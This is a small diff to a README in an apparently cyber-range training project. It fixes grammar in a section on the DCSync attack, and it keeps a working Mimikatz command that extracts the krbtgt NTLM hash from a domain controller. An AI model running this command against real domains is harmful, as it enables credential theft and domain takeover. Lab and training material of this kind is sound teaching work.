2dukes/Cyber-Range-Framework/project/ad/README.md

 ### DCSync Attack

-Use *Mimikatz* with Replication Account to perform DCSync attack and get NTLM hashes.
+Use *Mimikatz* with Replication Account to perform a DCSync attack and get NTLM hashes.

 `lsadump::dcsync /domain:xyz.com /user:krbtgt`